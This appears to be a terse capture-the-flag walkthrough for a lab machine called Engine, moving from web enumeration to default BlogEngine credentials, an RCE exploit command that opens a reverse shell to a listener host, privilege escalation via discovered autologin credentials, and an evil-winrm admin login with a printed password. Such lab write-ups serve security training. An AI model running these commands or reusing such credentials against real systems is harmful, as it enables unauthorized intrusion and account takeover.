CyberSec Labs Engine Walkthrough
Port 80 open
Gobuster finds a directory /blog
It is BlogEngine CMS, which is not configured properly and still has the default creds admin:admin
There's an RCE exploit available for it
python exploit.py -t 172.31.1.16/blog -l 10.10.0.51:920
For the proxy we can turn Burp Suite on and send the payload through it.
After running the exploit we get the shell back.
Running winPEAS finds some autologin creds
Using evil-winrm we can get an admin shell
evil-winrm -u administrator -p "PzCEKhvj6gQMk7kA" -i 172.31.1.16
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami